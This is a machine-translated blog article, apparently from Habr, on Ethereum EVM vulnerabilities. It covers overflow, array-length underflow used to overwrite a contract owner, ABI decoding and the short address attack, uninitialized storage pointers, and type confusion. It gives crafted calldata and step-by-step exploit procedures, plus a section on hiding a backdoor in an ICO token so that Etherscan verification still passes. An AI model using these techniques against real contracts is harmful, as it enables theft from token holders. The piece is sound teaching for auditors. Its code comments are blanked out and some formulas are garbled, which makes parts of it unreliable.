📜 ⬆️ ⬇️

Attention! S in Ethereum stands for Security. Part 2. EVM features


We present the second part of the cycle devoted to typical vulnerabilities, attacks and problem areas inherent in smart contracts in the Solidity language, and the Ethereum platform as a whole. Here we talk about some of the features of EVM and what vulnerabilities they can turn into.


In the first part, we discussed the front-running attack, various random number generation algorithms and network resiliency with the Proof-of-Authority consensus. And here the list is all the more extensive, but they all have a direct bearing on smart contracts. So let's go.


Overflow / underflow


Overflows in EVM can be for int and uint types of all digits and with many operations .
It looks like this:


contract _flow { uint public umax = 2**256 - 1; uint public umin = 0; int public max = int(~((uint(1) << 255))); int public min = int((uint(1) << 255)); function overflow() { umax++; max++; //  += 1; //  *= 2; } function underflow() { umin--; min--; //  -= 1; } } 

This can very often be found in the open spaces of the repository with smart contracts, because there is always balance , CAP , price , to which something is added, which multiply, divide, etc. A good practice would be to use the SafeMath library for the type of data you are working with. It should be borne in mind that Zeppelin SafeMath is only implemented for uint !


One more thing. It may not catch the eye, but for array.length also used, which can also be overflowed in the same way. Consider this example:


 contract Array { uint[] public array; address public owner; function Array() { owner = msg.sender; array.push(0xaa); } function underflow() { array.length--; } function modify(uint index, uint value) { array[index] = value; } } 

As you can see, there are no functions to change the owner , but anyone can become the owner.


Just tell me how

To begin with about storage . Storage is an address space of length 2 ** 256 with a cell size of 32 bytes. Simple types are put in a cell, so you can get them by key. And for complex types, for example, arrays, hashing is used. In the first cell responsible for the array, there will be its length, and the data itself will begin sequentially with the key, which is calculated as keccak256 (<cell_ number_s_length>). Storage is used to store data between transactions (function calls), as a kind of hard drive.


So, we proceed to the operation:


  1. Calling underflow until underflow occurs and the length is 2 ** 256
  2. Since Storage is in contract, the address space also has a length of 2 ** 256. And it turns out that the array now occupies it completely. But the owner is still in place, it is just now possible to get it with an index index
  3. Calculate this index:


     hex(2**256 - 0xbabecafe + 1) 

    where 0xbabecafe is the key cell in which the length of the array is stored (in the example it will be a zero cell), and 1 is the number of the cell in which the owner is stored


  4. Call modify :
    • index obtained in step 3.
    • value is the new address for owner . It's okay that the function accepts uint, - the address is also a number :)

You can read more about this example in solidity_tricks .


ABI encoding / decoding


To begin with, we note that in order to call a function of a smart contract through a transaction, it is necessary to specify its signature in tx.data . In the same place, the arguments that the function takes should follow. Details on how each type is encoded can be found in the documentation .


Two points need to be taken into account:



When calling, the function takes the arguments sent by calling the calldataload instruction and then its main logic is executed. Consider the behavior of different dynamic types on an example :


 contract DynamicTypes { uint public strLength; uint public bytsLength; uint public arrayLength; string public str; bytes public byts; address[] public array; //         function callme(string _str, bytes _byts, address[] _array) public { strLength = bytes(_str).length; str = _str; bytsLength = _byts.length; byts = _byts; arrayLength = _array.length; array = _array; } } 

Call the callme function with the following code:


 var modifiedArgs = [ //   - bytes4(sha3("callme(string,bytes,address[])")) '0x5fc059fd', //        _str '0000000000000000000000000000000000000000000000000000000000000060', //        _byts '00000000000000000000000000000000000000000000000000000000000000a0', //        _array '00000000000000000000000000000000000000000000000000000000000000e0', //  _str 64 .       ! '0000000000000000000000000000000000000000000000000000000000000040', //   -  *AAAA* .  4 . '4141414100000000000000000000000000000000000000000000000000000000', //  _byts 64 .       ! '0000000000000000000000000000000000000000000000000000000000000040', //   - 3  0x42 0x43 0x44 '4243440000000000000000000000000000000000000000000000000000000000', //  _array 64 .       ! '0000000000000000000000000000000000000000000000000000000000000040', //    '0000000000000000000000000000000000000000000000000000000000000001', //    '0000000000000000000000000000000000000000000000000000000000000002' ]; modifiedData = modifiedArgs.join(""); //        //     var tx = web3.eth.sendTransaction({ "to" : contractAdd, "data" : modifiedData, "gas" : 1185919 }); // PS       . 

After the transaction is processed, we will see the following picture:


As you can see, the string is not actually "AAAA" (@ at the end is an interpretation of 0x40 - length _byts), bytes in byts not three, as in the data that was sent (similarly hooked 0x40 in the next argument), well, 64th we can freely receive an element from array . Thus, to get data, EVM takes its length, cuts off how much is specified from tx.data , and transfers functions. And it does not matter that the next argument has already gone or that tx.data over, we will add zeros :)


And in the continuation of the topic we will talk about the Short address attack .


 contract ERC20 { address public who; uint public value; function transfer(address _who, uint _value) public { who = _who; value = _value; } } 

The contract has little to do with the original ERC20 token, but most importantly, the transfer function will have the same signature as the original. The Short address attack script is as follows:



Call transfer :


 // defaultArgs    ,   modifiedArgs var defaultArgs = [ '0xa9059cbb', //    0x00    '0000000000000000000000003a0c7287b9aac3c71ee8b9048c5dfb989f2a4d00', //    1  '0000000000000000000000000000000000000000000000000000000000000001' ]; var modifiedArgs = [ '0xa9059cbb', //         '0000000000000000000000003a0c7287b9aac3c71ee8b9048c5dfb989f2a4d', '0000000000000000000000000000000000000000000000000000000000000001' ]; modifiedData = modifiedArgs.join(""); var tx = web3.eth.sendTransaction({ "to" : contractAdd, "data" : modifiedData, "gas" : 1185919 }); 

The missing zero byte at the end of the address will be taken from value (the arguments are parsed on the left), and the value EVM itself will simply add up to 32 bytes (again, a zero byte). In other words, a byte shift of value value will occur, and it will become equal to 256 tokens (0x100), although the user wanted to translate only 1. In the general case:


value=2z8


where z is the number of zero bytes at the end of the address (that is, there may be 2 and 3 ...).


It is worth noting that although the attack is called the Short Address attack, in fact this is only a particular example. It is not necessary to bind to an address or a transfer function, just as it does to the uint type of value . All three components can be arbitrarily changed, expanding the classic idea of ​​a short address attack. Moreover, the word Short also refers to a particular example. The attacker can provide the address longer than usual, and the extra bytes will begin the value , and the ending will be cut off - that is, there will be a shift to the right.


Uninitialized storage pointer


This problem has already been addressed in Habré, so we will mention it briefly. Here for understanding it is necessary to keep in mind two points:



Now an example:


 contract Uninitialized { address public owner; //   Storage( ),  0x00 uint public balance; //   Storage( ),  0 struct Billy { address where; } function rewriteOwner(address _where) public { Billy tmp; //     Storage,   tmp.where = _where; } function rewriteBoth(bytes s) public { uint8[64] copy; //     Storage,   for (uint8 i = 0; i < 64; i++) copy[i] = uint8(s[i]); } } 

With a contract contract, the variables owner and balance initialized to default values, and there is no explicit code to change them. However, it is possible. If you call the rewriteOwner function with an address, assigning tmp.where = _where will also overwrite the owner . This happens because the variable tmp is a reference type, and for it is not explicitly specified where the data is stored, which means (by default) tmp refers to Storage, and to the zero cell.


The situation is completely similar for the copy array in the rewriteBoth function, but we mention it in order to show that the Storage cells are one after the other, and if 32 bytes of the zero cell are not enough, the next one will be overwritten, etc.


To prevent this from happening, there are two options:



Type confusion


The following feature relates to how EVM works with types. During the execution of type checks there is no, they all occur at the compiler level. And, as we saw in the examples above, functions are called by signature, and if the signature is not found, the fallback function will be called.


Consider this on the example of the epic battle from the movie The Matrix. Suppose the characters in the matrix are represented by smart contracts (Neo and Smith). And, for convenience, each has defined an abstract class for interacting with another (in its pure form, syntactic sugar):


 // ,   ,   : /*   Neo,       */ contract Neo { function obtainDamage (uint256 value); } //      contract Smith { uint public health = 100; function doDamage (address who) { Neo(who).obtainDamage(100); //     Neo } function obtainDamage (uint256 value) { health -= value; } } 

But the contract, which plays the role of Neo:


 /*    */ contract Smith { function obtainDamage (uint256 value); } contract Neo { uint8 public health = 100; function () { Smith(msg.sender).obtainDamage(100); } function obtainDamage (uint8 value) { health -= value; } } 

Both deploy their contracts in matrix network, learn each other's addresses, and the battle begins:



Why did it happen?

Let's take a closer look at the function of obtainDamage in the contract Neo. Its signature is actually equal to bytes4(sha3("obtainDamage(uint8)")) == 0x1f26cd3a , because the value type is different.


And now the question of "backfilling." How to implement backdoor in real ICO, Crypto <put animals here> and others?
Answer

Consider the example of ICO. ICO usually has two contracts - the ERC20 token and Crowdsale. Backdoor is placed in the token contract: for example, add the function scoopAndDisappear .


  • after deployment, on ethersan you only need the source code of crowdsale, which will also have a token contract, but the backdoor must, of course, be cut
  • for the address of the token, do not submit anything, and if they ask, you can answer something like the following: "there is already a token contract in the crowdsale".

This will work because etherscan compiles the source file that was provided to it, and checks the byte-code with what was in the transaction when it was created. If it is the same, then everything is fine. And it will coincide, because the token contract is needed there only to make the correct signatures for the call (the contract byte-code itself is not there).


Therefore, it is important that the developers point to the source codes of all contracts that are used in the project to etherscan.io. The only exception may be the case when one contract creates another (through the construction new ). Then yes - the current byte code will be in the creation stream.


And here is another example of a backdoor . A situation that develops due to the inattention of people.


Today, everything, in the next series, we will proceed directly to Solidity, and see how it differs from other programming languages.


')

Source: https://habr.com/ru/post/346408/


All Articles